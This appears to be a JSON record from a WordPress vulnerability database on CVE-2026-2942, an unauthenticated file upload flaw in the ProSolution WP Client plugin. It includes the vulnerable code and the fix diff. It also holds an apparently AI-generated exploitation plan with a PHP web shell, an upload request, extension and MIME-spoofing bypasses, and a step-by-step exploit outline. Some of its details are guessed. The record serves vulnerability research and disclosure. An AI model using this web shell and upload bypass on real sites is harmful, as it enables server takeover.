[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fCDfHvm52cax2v7Sa2TdPpAe4Q0BSLf9lOce1Nr4VOnc":3,"$fIkMqenqHYf6p46HCllhqkxsunC2y7YwsXK9ZiWmxOaI":1647},{"slug":4,"name":5,"version":6,"author":7,"author_profile":8,"description":9,"short_description":10,"active_installs":11,"downloaded":12,"rating":13,"num_ratings":13,"last_updated":14,"tested_up_to":15,"requires_at_least":16,"requires_php":17,"tags":18,"homepage":24,"download_link":25,"security_score":26,"vuln_count":27,"unpatched_count":13,"last_vuln_date":28,"fetched_at":29,"vulnerabilities":30,"developer":66,"crawl_stats":36,"alternatives":69,"analysis":171,"fingerprints":1599},"prosolution-wp-client","ProSolution WP Client","2.0.0","prosolution","https:\u002F\u002Fprofiles.wordpress.org\u002Fprosolution\u002F","\u003Cp>A client for the job portal and online application feature of WorkExpert, the leading webbased ERP software for temporary work busines, produced and maintained by ProSolution (prosolution.com). The plugin only works with WorkExpert software as backend.\u003C\u002Fp>\n\u003Cp>Plain Features list\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Search and Filter Job\u003C\u002Fli>\n\u003Cli>Apply for the job\u003C\u002Fli>\n\u003Cli>Api config and sync data in plugin backend\u003C\u002Fli>\n\u003Cli>Easy setup and automatic shortcode installation\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>One single shortcode handles everything.\u003C\u002Fp>\n\u003Cp>[prosolfrontend ] Shows job searching application view, job list and apply\u003C\u002Fp>\n","Find job and apply , wordpress plugin for prosolution.com jobs (ProSolution WP Client)",30,3419,0,"2026-03-17T08:56:00.000Z","6.9.4","5.9","7.0",[19,20,21,22,23],"application","education","experience","occupation","profession","https:\u002F\u002Fprosolution.com\u002Fprodukte-und-services\u002Fworkexpert.html","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fprosolution-wp-client.2.0.0.zip",94,1,"2026-04-08 
05:07:38","2026-04-06T09:54:40.288Z",[31],{"id":32,"url_slug":33,"title":34,"description":35,"plugin_slug":4,"theme_slug":36,"affected_versions":37,"patched_in_version":6,"severity":38,"cvss_score":39,"cvss_vector":40,"vuln_type":41,"published_date":28,"updated_date":42,"references":43,"days_to_patch":27,"patch_diff_files":45,"patch_trac_url":36,"research_status":48,"research_verified":49,"research_rounds_completed":50,"research_plan":51,"research_summary":52,"research_vulnerable_code":53,"research_fix_diff":54,"research_exploit_outline":55,"research_model_used":56,"research_started_at":57,"research_completed_at":58,"research_error":36,"poc_status":59,"poc_video_id":36,"poc_summary":60,"poc_steps":61,"poc_tested_at":62,"poc_wp_version":63,"poc_php_version":64,"poc_playwright_script":36,"poc_exploit_code":36,"poc_has_trace":65,"poc_model_used":36,"poc_verification_depth":36},"CVE-2026-2942","prosolution-wp-client-unauthenticated-arbitrary-file-upload-via-prosolfileuploadprocess","ProSolution WP Client \u003C= 1.9.9 - Unauthenticated Arbitrary File Upload via proSol_fileUploadProcess","The ProSolution WP Client plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'proSol_fileUploadProcess' function in all versions up to, and including, 1.9.9. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.",null,"\u003C=1.9.9","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Unrestricted Upload of File with Dangerous Type","2026-04-08 17:25:51",[44],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F3852aef6-42e7-4b71-a1ba-dd41284fd07b?source=api-prod",[46,47],"README.txt","prosolwpclient.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-2942 - ProSolution WP Client Arbitrary File Upload\n\n## 1. 
Vulnerability Summary\nThe **ProSolution WP Client** plugin (versions \u003C= 1.9.9) contains a critical unrestricted file upload vulnerability in its frontend application handler. The function `proSol_fileUploadProcess` (hooked via AJAX) fails to implement sufficient server-side file type validation. Although version 1.9.3 attempted to add extension checks, the implementation remained flawed or bypassed in subsequent versions up to 1.9.9, allowing unauthenticated attackers to upload executable PHP scripts and achieve Remote Code Execution (RCE).\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **AJAX Action:** `proSol_fileUploadProcess`\n*   **HTTP Method:** `POST` (Multipart\u002Fform-data)\n*   **Vulnerable Parameter:** `file` (or `files[]` depending on the JS uploader implementation)\n*   **Authentication:** None required (`wp_ajax_nopriv_` registration).\n*   **Preconditions:** The plugin must be active, and a nonce for the `prosol_nonce` action (inferred) is typically required to pass initial security checks.\n\n## 3. Code Flow\n1.  **Entry Point:** The plugin registers AJAX handlers for both logged-in and guest users:\n    *   `add_action('wp_ajax_proSol_fileUploadProcess', 'proSol_fileUploadProcess');`\n    *   `add_action('wp_ajax_nopriv_proSol_fileUploadProcess', 'proSol_fileUploadProcess');`\n2.  **Handler Initiation:** The `proSol_fileUploadProcess` function is called.\n3.  **Security Check:** It likely calls `check_ajax_referer('prosol_nonce', 'security')` or `wp_verify_nonce()`.\n4.  **Vulnerable Processing:** The function retrieves file data from `$_FILES`.\n5.  **Insufficient Validation:** It may check for extensions like `.jpg` or `.pdf` using a blacklist or a weak regex that can be bypassed (e.g., `.php.jpg` or `.phtml`). In some versions, it simply fails to verify the file extension on the server-side entirely, relying on client-side JS validation.\n6.  
**File Sink:** The file is moved to the uploads directory using `move_uploaded_file()` or `wp_handle_upload()`. If `wp_handle_upload` is used without proper `mimes` filtering, it defaults to allowing dangerous types if the user has specific caps, or if the plugin explicitly overrides the filter.\n\n## 4. Nonce Acquisition Strategy\nThe plugin uses `wp_localize_script` to pass the AJAX URL and a security nonce to the frontend application form generated by the `[prosolfrontend]` shortcode.\n\n*   **Shortcode:** `[prosolfrontend]`\n*   **Localization Object (Inferred):** `prosol_ajax` or `prosol_frontend_vars`\n*   **JS Variable Path:** `window.prosol_ajax?.nonce` or `window.prosol_frontend_vars?.security`\n\n**Acquisition Steps:**\n1.  **Create Trigger Page:** Use WP-CLI to create a page containing the required shortcode.\n    ```bash\n    wp post create --post_type=page --post_title=\"Apply\" --post_status=publish --post_content='[prosolfrontend]'\n    ```\n2.  **Navigate & Extract:** Use the browser tool to visit the page and extract the nonce.\n    *   `browser_navigate(\"http:\u002F\u002Flocalhost:8080\u002Fapply\")`\n    *   `browser_eval(\"prosol_ajax.nonce\")` (Verify the exact object name by inspecting `window` if this fails).\n\n## 5. Exploitation Strategy\n1.  **Preparation:** Create a simple PHP web shell: `\u003C?php echo \"VULN_CHECK: \" . (7*7); eval($_GET['cmd']); ?>`.\n2.  **Request Construction:**\n    *   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n    *   **Action:** `proSol_fileUploadProcess`\n    *   **Nonce Parameter:** `security` (or `nonce`, verify in JS source).\n    *   **File Parameter:** `file`\n3.  
**HTTP Request (via `http_request`):**\n    ```json\n    {\n      \"method\": \"POST\",\n      \"url\": \"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php\",\n      \"headers\": {\n        \"Content-Type\": \"multipart\u002Fform-data\"\n      },\n      \"data\": {\n        \"action\": \"proSol_fileUploadProcess\",\n        \"security\": \"EXTRACTED_NONCE_HERE\",\n        \"file\": {\n          \"name\": \"exploit.php\",\n          \"content\": \"\u003C?php echo 'POC_SUCCESS'; phpinfo(); ?>\",\n          \"type\": \"application\u002Fx-php\"\n        }\n      }\n    }\n    ```\n4.  **Response Analysis:** The plugin usually returns a JSON response containing the URL of the uploaded file or a success message with the path.\n    *   *Example Success Response:* `{\"success\":true,\"data\":\"http:\u002F\u002Flocalhost:8080\u002Fwp-content\u002Fuploads\u002Fprosolution\u002Fexploit.php\"}`\n\n## 6. Test Data Setup\n1.  **Plugin Configuration:**\n    *   Ensure the plugin is installed and activated: `wp plugin activate prosolution-wp-client`.\n    *   The plugin might require a dummy API Domain and User to render the frontend correctly (check \"Api Config\" tab settings in `README.txt`).\n2.  **Public Page:**\n    *   `wp post create --post_type=page --post_title=\"Job Application\" --post_status=publish --post_content='[prosolfrontend]'`\n\n## 7. Expected Results\n*   The AJAX request should return an HTTP 200 OK.\n*   The response body should contain a path or URL to the newly uploaded `exploit.php`.\n*   Accessing the file URL (e.g., `\u002Fwp-content\u002Fuploads\u002Fprosolution\u002Fexploit.php`) should execute the PHP code.\n\n## 8. Verification Steps\n1.  **File Existence:** Check the filesystem via WP-CLI or container shell.\n    ```bash\n    find \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads -name \"exploit.php\"\n    ```\n2.  
**Execution Check:** Perform an HTTP GET to the uploaded file.\n    ```bash\n    http_request --url \"http:\u002F\u002Flocalhost:8080\u002Fwp-content\u002Fuploads\u002Fprosolution\u002Fexploit.php\"\n    ```\n    Confirm the output contains \"POC_SUCCESS\".\n\n## 9. Alternative Approaches\n*   **Bypassing Blacklists:** If the plugin blocks `.php`, try extensions like `.phtml`, `.php7`, `.phps`, or `.inc`.\n*   **Filename Manipulation:** If the plugin appends a random string, look for the returned JSON which typically reveals the final filename.\n*   **Shortcode Variations:** If `[prosolfrontend]` doesn't load the script, check for other related shortcodes in the plugin source (e.g., `prosol_apply_form`).\n*   **Different Upload Sinks:** Check if the plugin uses `wp_ajax_nopriv_proSol_upload_attachment` or similar variations of the upload function name.","The ProSolution WP Client plugin for WordPress is vulnerable to unauthenticated arbitrary file uploads via the `proSol_fileUploadProcess` function. The v1.9.9 handler decides whether an upload is allowed from the MIME type sent by the client in the request (`$submit_data['type'][0]`, mapped through `proSol_mimeExt`) rather than from the uploaded file's name or content, so its server-side validation of file extensions and MIME types is insufficient, allowing attackers to upload executable PHP scripts and achieve remote code execution. Version 2.0.0 replaces this with an extension allowlist, a content-based MIME check using `finfo`, and a `getimagesize()` check for images.","\u002F\u002F public\u002Fclass-prosolwpclient-public.php (v1.9.9)\n\n\t\t\t\u002F\u002Fif the upload dir for prosolwpclient is not created then then create it\n\t\t\t$dir_info = $this->proSol_checkUploadDir();\n\t\t\t$submit_data  = $_FILES[\"files\"];\n\t\t\t$mime_type   = isset( $submit_data['type'] ) ? 
$submit_data['type'][0] : '';\n\t\t\t$ext = proSol_mimeExt($mime_type);\n\t\t\t\n\t\t\tif ( in_array( $ext, proSol_imageExtArr() ) || in_array( $ext, proSol_documentExtArr() ) ) {\n\t\t\t\tif ( is_array( $dir_info ) && sizeof( $dir_info ) > 0 && array_key_exists( 'folder_exists', $dir_info ) && $dir_info['folder_exists'] == 1 ) {\n\t\t\t\t\t$options = array(\n\t\t\t\t\t\t'script_url'     => admin_url( 'admin-ajax.php' ),\n\t\t\t\t\t\t'upload_dir'     => $dir_info['prosol_base_dir'],\n\t\t\t\t\t\t'upload_url'     => $dir_info['prosol_base_url'],\n\t\t\t\t\t\t'print_response' => false,\n\t\t\t\t\t);\n\t\n\t\t\t\t\t$upload_handler = new CBXProSolWpClient_UploadHandler( $options );\n\t\n\t\t\t\t\t$response_obj = $upload_handler->response['files'][0];\n\t\t\t\t\tif ( $response_obj->name != '' ) {\n\t\t\t\t\t\tif ( ! session_id() ) {\n\t\t\t\t\t\t\tsession_start();\n\t\t\t\t\t\t}\n\t\n\t\t\t\t\t\t$attached_file_name = $response_obj->name;\n\t\n\t\t\t\t\t\t$extension = pathinfo( $attached_file_name, PATHINFO_EXTENSION );\n\t\n\t\t\t\t\t\t$newfilename                 = wp_create_nonce( session_id() . time() ) . '.' . $extension;\n\t\t\t\t\t\t$rename_status               = rename( $dir_info['prosol_base_dir'] . $attached_file_name, $dir_info['prosol_base_dir'] . 
$newfilename );\n\t\t\t\t\t\t$response_obj->newfilename   = $newfilename;\n\t\t\t\t\t\t$response_obj->rename_status = $rename_status;\n\t\t\t\t\t\t$response_obj->extension     = $extension;\n\t\n\t\t\t\t\t\t$return_response = array( 'files' => array( 0 => $response_obj ) );\n\t\t\t\t\t\techo json_encode( $return_response );\n\t\t\t\t\t\twp_die();\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fprosolution-wp-client\u002F1.9.9\u002Fprosolwpclient.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fprosolution-wp-client\u002F2.0.0\u002Fprosolwpclient.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fprosolution-wp-client\u002F1.9.9\u002Fprosolwpclient.php\t2026-03-17 08:56:12.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fprosolution-wp-client\u002F2.0.0\u002Fprosolwpclient.php\t2026-03-17 08:56:12.000000000 +0000\n@@ -16,7 +16,7 @@\n      * Plugin Name:       ProSolution WP Client\n      * Plugin URI:        https:\u002F\u002Fprosolution.com\u002Fprodukte-und-services\u002Fworkexpert.html\n      * Description:       WordPress client for ProSolution\n-     * Version:           1.9.9\n+     * Version:           2.0.0\n      * Author:            ProSolution\n      * Author URI:        https:\u002F\u002Fwww.prosolution.com\n      * License:           GPL-2.0+\n@@ -41,7 +41,7 @@\n \n \n     defined('PROSOLWPCLIENT_PLUGIN_NAME') or define('PROSOLWPCLIENT_PLUGIN_NAME', 'prosolwpclient');\n-    defined('PROSOLWPCLIENT_PLUGIN_VERSION') or define('PROSOLWPCLIENT_PLUGIN_VERSION', '1.9.9');\n+    defined('PROSOLWPCLIENT_PLUGIN_VERSION') or define('PROSOLWPCLIENT_PLUGIN_VERSION', '2.0.0');\n     defined('PROSOLWPCLIENT_BASE_NAME') or define('PROSOLWPCLIENT_BASE_NAME', plugin_basename(__FILE__));\n     defined('PROSOLWPCLIENT_ROOT_PATH') or define('PROSOLWPCLIENT_ROOT_PATH', 
plugin_dir_path(__FILE__));\n     defined('PROSOLWPCLIENT_ROOT_URL') or define('PROSOLWPCLIENT_ROOT_URL', plugin_dir_url(__FILE__));\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fprosolution-wp-client\u002F1.9.9\u002Fpublic\u002Fclass-prosolwpclient-public.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fprosolution-wp-client\u002F2.0.0\u002Fpublic\u002Fclass-prosolwpclient-public.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fprosolution-wp-client\u002F1.9.9\u002Fpublic\u002Fclass-prosolwpclient-public.php\t2026-03-17 08:56:12.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fprosolution-wp-client\u002F2.0.0\u002Fpublic\u002Fclass-prosolwpclient-public.php\t2026-03-17 08:56:12.000000000 +0000\n@@ -995,43 +995,117 @@\n \n \t\t\t\u002F\u002Fif the upload dir for prosolwpclient is not created then then create it\n \t\t\t$dir_info = $this->proSol_checkUploadDir();\n-\t\t\t$submit_data  = $_FILES[\"files\"];\n-\t\t\t$mime_type   = isset( $submit_data['type'] ) ? $submit_data['type'][0] : '';\n-\t\t\t$ext = proSol_mimeExt($mime_type);\n+\t\t\t$submit_data  = $_FILES[\"files\"] ?? null;\n+\n+\t\t\t\u002F\u002Fthis is for if someone somehow able to run this function without file\n+\t\t\tif ( ! $submit_data ) {\n+\t\t\t\tdie(__(\"No file uploaded\", \"prosolwpclient\"));\n+\t\t\t}\n+\n+\t\t\t\u002F\u002F get file name and temp file location and sanitize them\n+\t\t\t$org_filename = isset( $submit_data['name'][0] ) ? sanitize_file_name( $submit_data['name'][0] ) : '';\n+\t\t\t$tmp_fileloc = isset( $submit_data['tmp_name'][0] ) ? $submit_data['tmp_name'][0] : '';\n+\n+\t\t\t\u002F\u002F if file name or location empty, process must be aborted\n+\t\t\tif ( empty( $org_filename ) || empty( $tmp_fileloc ) || ! 
is_uploaded_file( $tmp_fileloc ) ) {\n+\t\t\t\tdie(__(\"Invalid file\", \"prosolwpclient\"));\n+\t\t\t}\n+\t\t\t\u002F\u002Fcheck file extension for uploaded \"up\" file\n+    \t\t$up_fileext = strtolower( pathinfo( $org_filename, PATHINFO_EXTENSION ) );\n+\n+\t\t\t\u002F\u002Fsince most of cv or profile picture are typically using this format, we should whitelist these extension only.\n+\t\t\t\u002F\u002Fdo not use proSol_mimeExt function, it allow all kind of extension including big nono one like php or other programming language.\n+\t\t\t$whitelist_ext = array( 'jpg', 'jpeg', 'png', 'gif', 'webp', 'pdf', 'doc', 'docx' );\n+\n+\t\t\t\u002F\u002Fcheck extension first\n+\t\t\tif ( ! in_array( $up_fileext, $whitelist_ext, true ) ) {\n+\t\t\t\tdie(__(\"File type not allowed\", \"prosolwpclient\"));\n+\t\t\t}\n+\n+\t\t\t\u002F\u002Fcheck for REAL mime type, $submit_data['type'] only check for surface-level.\n+\t\t\t$finfoObj = new finfo( FILEINFO_MIME_TYPE );\n+\t\t\t$true_mmime = $finfoObj->file( $tmp_fileloc );\n+\n+\t\t\t\u002F\u002Fsyntax below is big nono, don't use it to check mime!!!\n+\t\t\t\u002F\u002F$mime_type   = isset( $submit_data['type'] ) ? 
$submit_data['type'][0] : '';\n+\t\t\t\u002F\u002Fagain do not use prosol_mimeext, they will allow script or programming language\n+\t\t\t\u002F\u002F$ext = proSol_mimeExt($mime_type);\n+\n+\t\t\t$wp_mime_chk = wp_check_filetype( $org_filename );\n+\t\t\tif ( $wp_mime_chk['type'] == false ) {\n+\t\t\t\tdie(__(\"File type is not allowed.\", \"prosolwpclient\"));\n+\t\t\t}\n+\n+\t\t\t\u002F\u002Fonly listed mimes type are allow\n+\t\t\t$whitelist_mimes = array(\n+\t\t\t\t'jpg'  => 'image\u002Fjpeg',\n+\t\t\t\t'jpeg' => 'image\u002Fjpeg',\n+\t\t\t\t'png'  => 'image\u002Fpng',\n+\t\t\t\t'gif'  => 'image\u002Fgif',\n+\t\t\t\t'webp' => 'image\u002Fwebp',\n+\t\t\t\t'pdf'  => 'application\u002Fpdf',\n+\t\t\t\t'doc'  => 'application\u002Fmsword',\n+\t\t\t\t'docx' => 'application\u002Fvnd.openxmlformats-officedocument.wordprocessingml.document',\n+\t\t\t);\n+\n+\t\t\t\u002F\u002Fcheck for real hidden mimes type\n+\t\t\tif ( ! isset( $whitelist_mimes[ $up_fileext ] ) || $true_mmime !== $whitelist_mimes[ $up_fileext ] ) {\n+\t\t\t\tdie(__(\"File content does not match its extension\", \"prosolwpclient\"));\n+\t\t\t}\n+\n+\t\t\tif ( in_array( $up_fileext, array( 'jpg', 'jpeg', 'png', 'gif', 'webp' ), true ) ) {\n+\t\t\t\t\u002F\u002Ffor image upload we can also verified image via dimension size like height and width, fake image file will be false result\n+\t\t\t\t$img_dimension = @getimagesize( $tmp_fileloc );\n+\t\t\t\tif ( $img_dimension === false ) {\n+\t\t\t\t\tdie(__(\"Invalid image dimension\", \"prosolwpclient\"));\n+\t\t\t\t}\n+\t\t\t}\n \t\t\t\n-\t\t\tif ( in_array( $ext, proSol_imageExtArr() ) || in_array( $ext, proSol_documentExtArr() ) ) {\n-\t\t\t\tif ( is_array( $dir_info ) && sizeof( $dir_info ) > 0 && array_key_exists( 'folder_exists', $dir_info ) && $dir_info['folder_exists'] == 1 ) {\n-\t\t\t\t\t$options = array(\n-\t\t\t\t\t\t'script_url'     => admin_url( 'admin-ajax.php' ),\n-\t\t\t\t\t\t'upload_dir'     => 
$dir_info['prosol_base_dir'],\n-\t\t\t\t\t\t'upload_url'     => $dir_info['prosol_base_url'],\n-\t\t\t\t\t\t'print_response' => false,\n-\t\t\t\t\t);\n-\t\n-\t\t\t\t\t$upload_handler = new CBXProSolWpClient_UploadHandler( $options );\n-\t\n-\t\t\t\t\t$response_obj = $upload_handler->response['files'][0];\n-\t\t\t\t\tif ( $response_obj->name != '' ) {\n-\t\t\t\t\t\tif ( ! session_id() ) {\n-\t\t\t\t\t\t\tsession_start();\n-\t\t\t\t\t\t}\n-\t\n-\t\t\t\t\t\t$attached_file_name = $response_obj->name;\n-\t\n-\t\t\t\t\t\t$extension = pathinfo( $attached_file_name, PATHINFO_EXTENSION );\n-\t\n-\t\t\t\t\t\t$newfilename                 = wp_create_nonce( session_id() . time() ) . '.' . $extension;\n-\t\t\t\t\t\t$rename_status               = rename( $dir_info['prosol_base_dir'] . $attached_file_name, $dir_info['prosol_base_dir'] . $newfilename );\n-\t\t\t\t\t\t$response_obj->newfilename   = $newfilename;\n-\t\t\t\t\t\t$response_obj->rename_status = $rename_status;\n-\t\t\t\t\t\t$response_obj->extension     = $extension;\n-\t\n-\t\t\t\t\t\t$return_response = array( 'files' => array( 0 => $response_obj ) );\n-\t\t\t\t\t\techo json_encode( $return_response );\n-\t\t\t\t\t\twp_die();\n-\t\t\t\t\t}\n-\t\t\t\t}\n-\t\t\t}\n+\t\t\tif ( is_array( $dir_info ) && sizeof( $dir_info ) > 0 && array_key_exists( 'folder_exists', $dir_info ) && $dir_info['folder_exists'] == 1 ) {\n+\t\t\t\t$options = array(\n+\t\t\t\t\t'script_url'     => admin_url( 'admin-ajax.php' ),\n+\t\t\t\t\t'upload_dir'     => $dir_info['prosol_base_dir'],\n+\t\t\t\t\t'upload_url'     => $dir_info['prosol_base_url'],\n+\t\t\t\t\t'print_response' => false,\n+\t\t\t\t);\n+\t\n+\t\t\t\t$upload_handler = new CBXProSolWpClient_UploadHandler( $options );\n+\t\n+\t\t\t\t$response_obj = $upload_handler->response['files'][0];\n+\n+\t\t\t\t\u002F\u002Fchange $response_obj->name != '' to !empty( $response_obj->name )\n+\t\t\t\tif ( ! empty( $response_obj->name ) ) {\n+\t\t\t\t\tif ( ! 
session_id() ) {\n+\t\t\t\t\t\tsession_start();\n+\t\t\t\t\t}\n+\t\n+\t\t\t\t\t$attached_file_name = $response_obj->name;\n+\t\n+\t\t\t\t\t\u002F\u002Fcheck final result extension, and make it universal lowercase\n+\t\t\t\t\t$fin_ext = strtolower( pathinfo( $attached_file_name, PATHINFO_EXTENSION ) );\n+\t\t\t\t\t\n+\t\t\t\t\t\u002F\u002Fcheck it one last time on the result\n+\t\t\t\t\tif ( ! in_array( $fin_ext, $whitelist_ext, true ) ) {\n+\t\t\t\t\t\tdie(__(\"File type mismatch after upload\", \"prosolwpclient\"));\n+\t\t\t\t\t}\n+\t\n+\t\t\t\t\t$newfilename                 = wp_create_nonce( session_id() . time() ) . '.' . $fin_ext;\n+\t\t\t\t\t$rename_status               = rename( $dir_info['prosol_base_dir'] . $attached_file_name, $dir_info['prosol_base_dir'] . $newfilename );\n+\t\t\t\t\t$response_obj->newfilename   = $newfilename;\n+\t\t\t\t\t$response_obj->rename_status = $rename_status;\n+\t\t\t\t\t$response_obj->extension     = $fin_ext;\n+\t\n+\t\t\t\t\t$return_response = array( 'files' => array( 0 => $response_obj ) );\n+\t\t\t\t\t\u002F\u002Fsuccess return\n+\t\t\t\t\techo json_encode( $return_response );\n+\t\t\t\t\twp_die();\n+\t\t\t\t}\n+\t\t\t}\n+\n+\t\t\t\u002F\u002Fdefault return\n+\t\t\twp_send_json_error( array( 'error' => 'Upload failed' ) );\n+\t\t\twp_die();\n+\t\t\t\n \t\t}","1. Access a public page on the target site containing the '[prosolfrontend]' shortcode and extract the 'prosol_nonce' (typically found in the localized script variables). 2. Prepare a multipart\u002Fform-data POST request to \u002Fwp-admin\u002Fadmin-ajax.php. 3. Set the 'action' parameter to 'proSol_fileUploadProcess' and the 'security' parameter to the extracted nonce. 4. Attach a malicious PHP script (e.g., shell.php) in the 'files[]' parameter. 5. To bypass the plugin's weak validation, set the Content-Type of the file part to an allowed image or document MIME type (e.g., 'image\u002Fjpeg'). 6. 
The plugin will process the upload and return a JSON response containing the newly generated filename in the uploads directory. 7. Execute the uploaded PHP script by visiting its direct URL, typically located at \u002Fwp-content\u002Fuploads\u002Fprosolution\u002F[filename].php.","gemini-3-flash-preview","2026-04-16 16:33:02","2026-04-16 16:34:30","failed","All models in the chain (gemini-3-flash-preview, claude-opus-4-7) failed to produce a verified exploit.",[],"2026-04-17 19:22:57","6.7","8.3",true,{"slug":7,"display_name":7,"profile_url":8,"plugin_count":27,"total_installs":11,"avg_security_score":26,"avg_patch_time_days":27,"trust_score":67,"computed_at":68},96,"2026-04-18T19:25:06.478Z",[70,94,112,133,153],{"slug":71,"name":72,"version":73,"author":74,"author_profile":75,"description":76,"short_description":77,"active_installs":78,"downloaded":79,"rating":80,"num_ratings":81,"last_updated":82,"tested_up_to":15,"requires_at_least":83,"requires_php":84,"tags":85,"homepage":89,"download_link":90,"security_score":91,"vuln_count":27,"unpatched_count":13,"last_vuln_date":92,"fetched_at":93},"resume-builder","Resume Builder","3.3","Justin Scheetz","https:\u002F\u002Fprofiles.wordpress.org\u002Fjustinscheetz\u002F","\u003Cp>Create one or many resumes—complete with contact information, education & experience history, as well as a list of skills—with this incredibly easy-to-use plugin!\u003C\u002Fp>\n\u003Cp>Be sure to check out the \u003Cstrong>\u003Ca href=\"https:\u002F\u002Fresumebuilder.studio\u002F\" rel=\"nofollow ugc\">online demo\u003C\u002Fa>\u003C\u002Fstrong>!\u003C\u002Fp>\n\u003Ch4>Quality design & usability\u003C\u002Fh4>\n\u003Cp>Using the drag & drop resume builder, you can create your resume quickly and without limitations. 
Add contact information, education, experience, skills and more.\u003C\u002Fp>\n\u003Ch4>Many premium features included\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>A super-intuitive resume builder with drag & drop capabilities.\u003C\u002Fli>\n\u003Cli>A beautiful default resume template.\u003C\u002Fli>\n\u003Cli>The ability to show specific parts of your resume with shortcode options.\u003C\u002Fli>\n\u003Cli>Contact Information\u003C\u002Fli>\n\u003Cli>Experience & Education\u003C\u002Fli>\n\u003Cli>Skills\u003C\u002Fli>\n\u003Cli>Very developer-friendly with loads of hooks & filters.\u003C\u002Fli>\n\u003Cli>And more to come…\u003C\u002Fli>\n\u003C\u002Ful>\n","Create one or many resumes with a photo, contact info, education, experience, skills, and more!",1000,129023,88,17,"2026-03-10T18:00:00.000Z","4.7","7.4",[20,21,86,87,88],"resume","resumes","skills","https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fresume-builder\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fresume-builder.3.3.zip",100,"2023-02-13 00:00:00","2026-04-16T10:56:18.058Z",{"slug":95,"name":96,"version":97,"author":98,"author_profile":99,"description":100,"short_description":101,"active_installs":91,"downloaded":102,"rating":91,"num_ratings":27,"last_updated":103,"tested_up_to":104,"requires_at_least":105,"requires_php":106,"tags":107,"homepage":109,"download_link":110,"security_score":111,"vuln_count":13,"unpatched_count":13,"last_vuln_date":36,"fetched_at":93},"hm-resume-manager","HM Resume Manager","2.4.1","Hossni Mubarak","https:\u002F\u002Fprofiles.wordpress.org\u002Fmhmrajib\u002F","\u003Cp>\u003Ca href=\"https:\u002F\u002Fhmplugin.com\u002Fdemo\u002Fresume-demo\u002F\" rel=\"nofollow ugc\">\u003Cstrong>Live Demo\u003C\u002Fstrong>\u003C\u002Fa> | \u003Ca href=\"https:\u002F\u002Fhmplugin.com\u002Fdemo\u002Fresume-demo\u002F\" rel=\"nofollow ugc\">\u003Cstrong>Live Chat\u003C\u002Fstrong>\u003C\u002Fa> | \u003Ca href=\"https:\u002F\u002Fhmplugin.com\u002Fcontact\u002F\" 
rel=\"nofollow ugc\">\u003Cstrong>Support\u003C\u002Fstrong>\u003C\u002Fa>\u003C\u002Fp>\n\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FRO4fParfoAU?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\n\u003Ch4>Overview\u003C\u002Fh4>\n\u003Cp>\u003Cstrong>WordPress Resume Manager Plugin\u003C\u002Fstrong> to display and manage personal resume or CV at your WordPress webpage\u003C\u002Fp>\n\u003Cp>You have a domain and you are confused what to do with it? Why not use it as a resume landing page and point people to should a conversation occur surrounding job prospects.\u003C\u002Fp>\n\u003Cp>This plugin creates a resume with personal information, education & experience history, as well as a list of skills with career summary.\u003C\u002Fp>\n\u003Cp>It looks great, is fast and easy to manage.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>🌟 Plugin Features:\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Easy to install\u003C\u002Fli>\n\u003Cli>Fully integrated in WordPress\u003C\u002Fli>\n\u003Cli>Easy to use\u003C\u002Fli>\n\u003Cli>Fully Responsive\u003C\u002Fli>\n\u003Cli>Photo Upload option\u003C\u002Fli>\n\u003Cli>Option to change resume background color\u003C\u002Fli>\n\u003Cli>Option to change resume border color\u003C\u002Fli>\n\u003Cli>Option to change skill label text\u003C\u002Fli>\n\u003Cli>Option to change education label text\u003C\u002Fli>\n\u003Cli>Option to change experience label text\u003C\u002Fli>\n\u003Cli>Shortcoded\u003C\u002Fli>\n\u003Cli>Display Skills with progressbar\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>🌟 Resume 
